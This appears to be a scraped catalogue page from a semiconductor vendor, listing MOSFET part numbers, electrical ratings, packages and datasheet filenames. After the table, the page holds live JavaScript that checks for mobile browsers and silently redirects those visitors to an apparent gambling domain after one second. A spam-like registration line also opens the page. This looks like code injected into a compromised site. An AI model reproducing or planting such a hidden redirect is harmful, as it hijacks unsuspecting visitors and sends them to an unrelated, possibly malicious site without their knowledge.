5197注册

  • EN

MOSFET

Part Number Configuration Type ESD Drain-Source Voltage(V) Gate-Source Voltage(V) Gate-Threshold Voltage, VGS(th)(V) Continuous Drain Current, ID(A) Static Drain-Source On-Resistance RDS(ON) (mΩ) Max. at VGS= Power Dissipation Package download
VDS VGS Min. Max. TA=25℃ TA=70℃ Tc=25℃ Tc=100℃ 10V 4.5V 2.5V 1.8V 1.5V PD(W)
YS6912K Single N No 60 ±20 1.2 2.5 - - 5 3.2 75 90 - - - 1.79 SOT-89 YS6912K_REV.02_20200522.pdf
YS6912L Single N No 60 ±20 1.2 2.5 - - 5 3.2 75 90 - - - 1.79 SOT-223 YS6912L_REV.02_20200522.pdf
YS6912S Single N No 60 ±20 1.2 2.5 - - 3.2 2 75 90 - - - 1.56 SOT-23 YS6912S_REV.02_20200522.pdf
YS6964Z-5BB Single N No 60 ±20 1 2.5 - - 32 20.2 17.5 23 - - - 46 PPAK3X3 YS6904Z-5BB_REV.02_20200522.pdf
YS6964ZBB Single N No 60 ±20 1.2 2.5 - - 35 22 15 19 - - - 46 PPAK3X3 YS6964ZBB_REV.02_20200522.pdf
YS6988Z-5BB Single N No 65 20/-12 1 2.5 - - 35 22 16 24 - - - 33.8 PPAK3X3 YS6988Z-5BB_REV.02_20200522.pdf
YS7N65F Single N No 650 ±30 2 4 - - 7 - 1500 - - - - 48 TO-220F YS7N65_REV.02_20200507.pdf
YS7N65H Single N No 650 ±30 2 4 - - 7 - 1500 - - - - 142 TO-263 YS7N65_REV.02_20200507.pdf
YS7N65J Single N No 650 ±30 2 4 - - 7 - 1500 - - - - 142 TO-262 YS7N65_REV.02_20200507.pdf
YS7N65P Single N No 650 ±30 2 4 - - 7 - 1500 - - - - 142 TO-220 YS7N65_REV.02_20200507.pdf
YS80N03BA Single N No 30 ±20 1 2.5 - - 80 50 5.5 8 - - - 53 PPAK5X6 YS80N03BA_REV.02_20200522.pdf
YS80N03D Single N No 30 ±20 1 2.5 - - 80 57 5.5 8 - - - 59 TO-252 YS80N03D_REV.02_20200522.pdf
YS8205AOE Dual Com. Drain N+N No 20 ±8 0.5 1.5 6 - - - - 27 38 - - 1.5 TSSOP-8 YS8205AOE_REV.02_20200522.pdf
YS9435JM Single P No -30 ±20 -1 -2 -5.1 -4.1 - - 50 75 - - - 2 SOP-8 YS9435JM_REV.02_20200522.pdf
YS9904M Dual N+N No 40 ±20 1 2.5 7.2 5.6 - - 30 40 - - - 2.5 SOP-8 YS9904M_REV.02_20200522.pdf
YS9971AM Dual N+N No 60 ±20 1 2.5 5 4 - - 36 45 - - - 1.5 SOP-8 YS9971AM_REV.02_20200522.pdf
YS9971L Single N No 60 ±20 1 2.5 5 4 - - 36 45 - - - 1.5 SOT-223 YS9971L_REV.02_20200522.pdf
YSE2120AYVB Dual N+P Yes 20 ±12 0.3 1 - - 0.8 0.51 - 300 400 550 800 0.312 SOT-563 YSE2120AYVB_REV.02_20200522.pdf
YSE2120AYVB Dual N+P Yes -20 ±12 -0.3 -1 - - -0.4 -0.25 - 600 850 1200 1600 0.312 SOT-563 YSE2120AYVB_REV.02_20200522.pdf
YSE2210KBB Dual N+N Yes 20 ±10 0.3 1 8.6 6.8 - - - 14 16 20 - 1.67 PPAK3X3 YSE2210KBB_REV.02_20200522.pdf
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();